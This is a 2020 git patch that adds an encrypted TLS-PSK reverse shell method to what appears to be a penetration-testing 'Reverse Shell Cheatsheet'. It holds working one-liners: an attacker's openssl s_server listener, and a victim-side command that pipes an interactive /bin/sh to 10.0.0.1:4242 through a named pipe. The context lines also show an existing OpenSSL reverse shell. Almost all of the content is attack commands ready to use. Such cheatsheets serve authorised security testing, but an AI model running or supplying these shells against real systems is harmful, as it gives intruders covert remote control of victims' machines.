From 2d7d6d6eed40f4a8d02e155a84b5671267459625 Mon Sep 17 00:00:00 2001
From: Artiom Mocrenco
Date: Wed, 8 Jul 2020 17:01:38 +0300
Subject: [PATCH] Add TLS-PSK OpenSSL reverse shell method

---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 0362a8a..4384d00 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
+TLS-PSK (does not rely on PKI or self-signed certificates)
+```bash
+# generate 48-bit PSK
+# use the generated string as a value for the two PSK variables from below
+openssl rand -hex 48
+# server (attacker)
+export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
+# client (victim)
+export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
+```
+
 ### Powershell
 ```powershell